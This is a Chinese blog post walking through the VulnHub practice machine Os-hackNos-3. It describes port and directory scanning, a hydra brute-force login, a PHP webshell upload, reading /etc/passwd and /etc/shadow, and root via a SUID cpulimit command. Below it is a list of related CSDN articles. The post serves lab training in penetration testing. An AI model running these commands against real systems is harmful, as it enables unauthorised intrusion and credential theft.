vulnhub 靶场 Os-hackNos-3

最新推荐文章于 2023-11-22 17:20:56 发布
最新推荐文章于 2023-11-22 17:20:56 发布
阅读量131 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzzzkeai/article/details/128063303
版权

信息收集

因为是做的靶场就主要收集端口目录,cms

主机发现

ifconfig
nmap xxx.xxx.xxx.0/24
一般来说1,2,255,254都是网关

端口扫描

nmap -sS -A 192.168.221.135 -p-

目录扫描

dirb http://192.168.221.135:80
dirsearch -u http://192.168.221.135:80    

中间件

whatweb 192.168.221.135

威胁建模

信息收集可以看到端口开啦22,80

可以访问的目录有

http://192.168.221.135:80/index.html
http://192.168.221.135:80/scripts/

渗透攻击

访问index.html

可以看到提示extra websec访问websec

访问http://192.168.221.135/websec/

dirb扫一下二级目录
dirb http://192.168.221.135/websec/

 

访问完发现没有什么特别的

就有一个登录目录是用邮箱登录的然后各种页面里面都有一个很显眼的邮箱

猜测这个是用户名然后尝试爆破,没有爆破出来,通过看别人文章学到拉一个工具cewl,可以跟一个外部链接,结果会返回一个单词列表

cewl http://192.168.221.135/websec/ > 220913.txt

然后就获得啦可以用来爆破我们猜测的这个用户名的密码啦。然后用hydra爆破

hydra -l contact@hacknos.com -P 220913.txt 192.168.221.135 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
//hydra  -l 用户名 -P 密码字典   IP地址 http-post-form "目录:user=^USER6&pw=^PASS^:猜错后返回的信息提示"

爆破出密码是Securityx 

用这个用户名密码去登录

进入后感觉都admin权限啦这不为所欲为感觉这个页面也提示可以干什么啦

一些php改后缀的方法没有成功

 

那就生成一个图片马

不太行

这里dirb一下登录成功后的目录吧,因为感觉没有找到上传后的那个文件目录

可以看到这里可以直接看PHP info

 

找到文件上传的目录啦然后发现有htaccess文件

admin直接删

然后直接上传php一句话木马

用蚁剑连接

查看一下基本信息

 

随后随便看拉一下文件
cat /etc/passwd
cat /etc/shadow
python3 -c 'import pty; pty.spawn("/bin/bash")' 

 

传马吧,感觉文件能看的都看啦一遍暂时没有

访问

后渗透攻击

然后查找可供提权的命令

后尝试输入bin/bash命令来进行提权

cpulimit -l 100 -f -- /bin/sh -p

成功提权拿到flag

嘿嘿也不太行!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二周渗透测试靶场实践
张子悦^^的博客
10-12 328
第二周渗透测试靶场实践信息收集扫描端口漏洞利用phpMyadminyxcms后渗透域内信息收集反弹shell提权利用cs与msf联动设置代理cs的准备工作系统信息收集主机密码收集cs读内存cs读注册表密码利用cs设置代理msf配置代理添加路由msf扫描内网主机内网信息收集获取内网主机权限窃取Token总结 信息收集 扫描端口 靶场地址:10.203.87.175 nmap -sS -sV -A 10.203.87.175 开了80端口,浏览器打开 发现备份文件,点击备份文件,解压 打开每
靶机测试Os-hacknos-3笔记
qq_56426046的博客
01-07 502
Difficulty: IntermediateFlag: 2 Flag first user And the second rootLearning: Web Application | Enumeration | Privilege EscalationWeb-site: www.hacknos.comContact-us : @rahul_gehlautThis works better with VirtualBox rather than VMwarehttps://www.vulnhub.com
Hacknos-3
qq_45747465的博客
06-13 74
打靶--Hacknos-3
Os-hackNos-3
果粒程
11-22 257
Os-hackNos-3
Vulnhub靶机:HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1937
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
靶机Hacknos-3
weixin_50815573的博客
02-23 2587
kali ip:192.168.1.131 target ip:192.168.1.23 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.23为入侵目标靶机... nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O 登录可以发现这样的页面 步骤二:
oscp——Os-hackNos-3
王嘟嘟的博客
02-02 870
0x00 前言 这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。 最后,E788B1E88081E5A986E5939F 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 0x01 信息收集 ip 端口 0x02 攻击 端口 端口未果 Web 80端口访问一下,dirb dirb爆破结果 dirb htt...
VulnHubOs-hackNos-3
weixin_39219503的博客
01-07 797
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
VulnHub系列』hackNos: Os-hackNos-3-Walkthrough
ins1ght的博客
01-19 1188
这是我完成的VulnHub上的第33个靶机。靶机发布日期:2019年12月14日,难度:中等。标签:docker提权、cpulimit提权
VulnhubOs-hackNos-1
4ut15m's blog
02-14 2731
Description url:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ Flag : 2 Flag first user And second root Learning : exploit | Web Application | Enumeration | Privilege Escalation 信息搜集 目标:19...
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 704
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
【甄选靶场Vulnhub百个项目渗透——项目五十:Os-hackNos-3IMF-1(gila—cmsfakespreadsheet解密)
人间体佐菲的博客
10-24 810
【甄选靶场Vulnhub百个项目渗透——项目五十:Os-hackNos-3IMF-1(gila—cmsfakespreadsheet解密)
No.50-VulnHub-hackNos: Os-hackNos-3-Walkthrough渗透学习
qq_34801745的博客
02-09 709
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年12月14日 靶机描述: Difficulty: Intermediate Flag: 2 Flag first user A...
vulnhub靶机之Os-hackNos
timesleep的博客
12-13 475
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载出来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值